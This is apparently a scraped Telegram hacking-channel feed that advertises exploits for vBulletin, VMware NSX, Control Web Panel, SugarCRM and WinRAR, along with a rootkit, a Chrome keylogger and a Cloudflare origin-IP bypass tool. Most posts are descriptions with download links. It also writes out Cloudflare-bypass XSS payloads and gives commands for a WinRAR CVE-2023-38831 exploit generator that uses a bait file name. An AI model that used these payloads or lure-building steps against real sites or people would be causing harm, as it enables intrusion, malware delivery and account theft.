vBulletin_5.5.2
vBulletin 5.5.2 PHP Object Injection Exploit
🌐 Github
#RemoteCode #Exploit #Php #Injection
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
vBulletin 5.5.2 PHP Object Injection Exploit
#RemoteCode #Exploit #Php #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
VMware-NSX-Manager-XStream
VMware NSX Manager XStream Unauthenticated Remote Code Execution Exploit
CVE :🌐 Github
#RemoteCode #Exploit #Php #Injection
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
VMware NSX Manager XStream Unauthenticated Remote Code Execution Exploit
CVE :
CVE-2021-39144
#RemoteCode #Exploit #Php #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2022-31188_SSRF.txt
1.4 KB
CVAT 2.0 - SSRF (Server Side Request Forgery)
🗂 Description:
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
⌨ Type: webapps
💻 Platform: Python
🌐 Vendor Homepage: 🌐 Github
🛡 Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
👑 CVE: CVE-2022-31188
#CVE #SSRF #Exploit #Python
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability.
#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.
#CVE #SSRF #Exploit #Python
Please open Telegram to view this post
VIEW IN TELEGRAM
Control-Web-Panel.txt
3.8 KB
Control Web Panel Unauthenticated Remote Command Execution Exploit
➖ Category: remote exploits
🖥 Platform: linux
🪖 Risk: Security Risk Critical 🚨
🗂️ Size: 🅰 🅰 🅰 📝 📝
📝
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
⭐ CVE: CVE-2022-44877
#CVE #Linux #Exploit
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
#CVE #Linux #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Exploits bank of NMAP program
🔗 Link
#Nmap #Vuln #Exploit
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
#Nmap #Vuln #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Post exploitation tools:
➕ Vegile — Ghost In The Shell:
😸 GitHub
➕ Chrome Keylogger:
😸 GitHub
➕ Forensic tools
➕ Autopsy:
😸 GitHub
➕ Wireshark:
🌐 Site
➕ Bulk extractor:
😸 GitHub
➕ Disk Clone and ISO Image Aquire:
🌐 Site
➕ Toolsley:
🌐 SIte
#RootKit #Keylogger #Exploit #Tools
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
#RootKit #Keylogger #Exploit #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
SugarCRM 12.x Remote Code Execution / Shell Upload Exploit
Category: remote exploits
Platform: php
Risk: [Security Risk Critical]
Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.
CVE: 2023-22952
Download
#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Category: remote exploits
Platform: php
Risk: [Security Risk Critical]
Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.
CVE: 2023-22952
Download
#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Microsoft Windows 11 - 'cmd.exe' Denial of Service
Platform: Windows
Type: dos
Exploit-db
Dwonload
#Windows #Exploit #Python
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Platform: Windows
Type: dos
Exploit-db
Dwonload
#Windows #Exploit #Python
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Marijuana Exploit 🍀
⬇️ Download
🔒
#Exploit #Bot
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 t.iss.one/BugCod3
📢 t.iss.one/LearnExploit
@LearnExploit#Exploit #Bot
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Generate the default poc for test
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>
to generate your exploit
BugCod3#CVE #Winrar #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡1👍1 1
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.
sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com
BugCod3#Cloudflare #Bypass #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4 2⚡1👍1🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
Run Script with Python 2.7
python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml
@LearnExploit#Exploit #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudflare bypass XSS payloads
Tested On:👩💻
XSS Payloads:
#Exploit #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Tested On:
XSS Payloads:
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">#Exploit #XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 3⚡2❤2
The useful exploit finder
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
pip install -r requirements.txt
python sicat.py --help
From keyword:
python sicat -k telerik --exploitdb --msfmodule
From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm
BugCod3#Exploit #Metasploit #Finder
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1🔥1🐳1